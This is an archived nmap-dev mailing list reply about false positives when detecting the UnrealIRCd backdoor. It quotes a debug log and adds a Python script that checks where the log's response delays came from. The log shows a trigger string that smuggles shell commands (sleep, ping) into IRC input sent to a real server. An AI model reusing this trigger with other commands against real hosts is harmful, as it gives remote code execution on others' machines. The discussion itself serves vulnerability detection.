Nmap Development mailing list archives

Re: Always practice safe software: a lesson from UnrealIRCd


From: David Fifield <david () bamsoftware com>
Date: Wed, 23 Jun 2010 18:38:05 -0600

On Wed, Jun 23, 2010 at 07:21:23PM -0500, Ron wrote:
I found a better way to detect vulnerable servers, but unfortunately
it isn't something an average person can do (requires a DNS
authoritative server). 

From the original list, with a 20 second delay and 40 second timeout,
on the list you provided earlier, I found:
o 4 vulnerable servers
o 3 were discovered
o 1 false positive
o 1 was missed because of 'too many reconnects'

So, that isn't very good. We can make the delays even longer, and I
think it'll get rather accurate, but I don't think that's ideal,
either. I'm going to give mutex a shot, still. 

Ah, so the timing is accurate enough, but it's not really an accurate
reflection of whether the vulnerability exists. I tried using
irc-unrealircd-backdoor.command to ping a server, and against all the 9-
and 11-second hosts, a vulnerability was detected but I didn't receive
any pings.

It looks like the delay is really being caused by a lack of an auth
response.

Discovered open port 6667/tcp on 91.121.137.140
NSE: Starting irc-unrealircd-backdoor against 91.121.137.140:6667.
NSOCK (0.5030s) TCP connection requested to 91.121.137.140:6667 (IOD #2) EID 16
NSOCK (0.6610s) Callback: CONNECT SUCCESS for EID 16 [91.121.137.140:6667]
NSE: TCP 192.168.0.21:47629 > 91.121.137.140:6667 | CONNECT
NSE: TCP 192.168.0.21:47629 > 91.121.137.140:6667 | AB||SOMETHINGUNIQUE||sleep 8||ping -n 9 127.0.0.1
NSOCK (0.6700s) Write request for 50 bytes to IOD #2 EID 75 [91.121.137.140:6667]: AB||SOMETHINGUNIQUE||sleep 8||ping -n 9 127.0.0.1.
NSOCK (0.6700s) Callback: WRITE SUCCESS for EID 75 [91.121.137.140:6667]
NSOCK (0.6900s) Read request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 106
NSOCK (0.8180s) Callback: READ SUCCESS for EID 106 [91.121.137.140:6667] (122 bytes)
NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net NOTICE AUTH :*** Looking up your hostname...
NSOCK (0.8420s) Read request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 154
NSOCK (0.9770s) Callback: READ SUCCESS for EID 154 [91.121.137.140:6667] (100 bytes)
NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
NSOCK (0.9940s) Read request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 178
NSOCK (12.4170s) Callback: READ SUCCESS for EID 178 [91.121.137.140:6667] (82 bytes)
NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net NOTICE AUTH :*** No ident response; username prefixed with ~
NSOCK (12.4170s) Read request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 274
NSOCK (12.5740s) Callback: READ SUCCESS for EID 274 [91.121.137.140:6667] (77 bytes): :Gioia.OceanIRC.net 451 AB||SOMETHINGUNIQUE||sleep :You have not registered..
NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net 451 AB||SOMETHINGUNIQUE||sleep :You have not registered

David Fifield
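The point David makes from the debug output, that the long wait sits in front of the "No ident response" notice and not in front of the server's reply to the probe, can be checked mechanically by splitting the NSOCK timeline into per-reply gaps. The script below is an added example, not part of the original message or of the irc-unrealircd-backdoor script; it parses the NSOCK/NSE debug lines quoted above (re-joined where the archive wrapped them) and reports where the time went. The function names, the line regexes and the 8-second threshold (taken from the "sleep 8" in the probe) are this example's own assumptions.

```python
import re
from typing import Dict, List, Optional, Tuple

# Data for this example: the NSOCK/NSE debug lines quoted in the message above,
# with wrapped lines re-joined. Nothing here was captured freshly.
SAMPLE_LOG = """\
NSOCK (0.6700s) Callback: WRITE SUCCESS for EID 75 [91.121.137.140:6667]
NSOCK (0.8180s) Callback: READ SUCCESS for EID 106 [91.121.137.140:6667] (122 bytes)
NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net NOTICE AUTH :*** Looking up your hostname...
NSOCK (0.9770s) Callback: READ SUCCESS for EID 154 [91.121.137.140:6667] (100 bytes)
NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
NSOCK (12.4170s) Callback: READ SUCCESS for EID 178 [91.121.137.140:6667] (82 bytes)
NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net NOTICE AUTH :*** No ident response; username prefixed with ~
NSOCK (12.5740s) Callback: READ SUCCESS for EID 274 [91.121.137.140:6667] (77 bytes): :Gioia.OceanIRC.net 451 AB||SOMETHINGUNIQUE||sleep :You have not registered..
NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net 451 AB||SOMETHINGUNIQUE||sleep :You have not registered
"""

# Assumed line shapes, matching the debug output quoted in the message.
NSOCK_RE = re.compile(r"^NSOCK \((\d+\.\d+)s\) Callback: (WRITE|READ) SUCCESS")
NSE_IN_RE = re.compile(r"^NSE: TCP \S+ < \S+ \| (.*)$")


def read_gaps(log: str) -> List[Tuple[float, str]]:
    """Return (seconds since the previous event, server message) for every reply.

    The clock starts at the WRITE SUCCESS of the probe, so the first gap is the
    server's first reaction and each later gap is the wait before that reply.
    """
    gaps: List[Tuple[float, str]] = []
    prev_t: Optional[float] = None     # time of the last accounted event
    pending_t: Optional[float] = None  # READ SUCCESS time awaiting its NSE line
    for line in log.splitlines():
        m = NSOCK_RE.match(line)
        if m:
            t = float(m.group(1))
            if m.group(2) == "WRITE":
                prev_t = t
            elif prev_t is not None:
                pending_t = t
            continue
        m = NSE_IN_RE.match(line)
        if m and pending_t is not None and prev_t is not None:
            gaps.append((round(pending_t - prev_t, 4), m.group(1)))
            prev_t, pending_t = pending_t, None
    return gaps


def analyze(log: str, sleep_seconds: float = 8.0) -> Dict[str, object]:
    """Attribute the total wait to either pre-registration lookups or the probe reply.

    'lookup'  : the longest wait ends with a NOTICE AUTH line (hostname/ident
                lookup), so it says nothing about the command being executed.
    'command' : the longest wait ends with the server's answer to the probe.
    'prompt'  : no wait reached the sleep length at all.
    """
    gaps = read_gaps(log)
    if not gaps:
        return {"gaps": [], "total": 0.0, "verdict": "no replies"}
    total = round(sum(g for g, _ in gaps), 4)
    longest, msg = max(gaps, key=lambda g: g[0])
    if longest < sleep_seconds:
        verdict = "prompt"
    elif "NOTICE AUTH" in msg:
        verdict = "lookup"
    else:
        verdict = "command"
    # How long the reply to the probe itself took, measured from the previous reply.
    reply_gap = next((g for g, m in gaps if " 451 " in m), None)
    return {"gaps": gaps, "total": total, "verdict": verdict, "reply_gap": reply_gap}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for gap, msg in result["gaps"]:
        print(f"{gap:8.3f}s  {msg[:70]}")
    print(f"total {result['total']}s, verdict: {result['verdict']}, "
          f"451 reply after {result['reply_gap']}s")
```

On the quoted output the total wait from the probe to the 451 numeric is 11.904 s, which a threshold of a few seconds would flag, yet 11.44 s of it ends with the ident notice and the 451 follows the last notice after only 0.157 s. A timing check that starts its clock only after the last NOTICE AUTH line, or that requires the out-of-band ping David describes, avoids counting a slow ident lookup as a backdoor.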
_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/
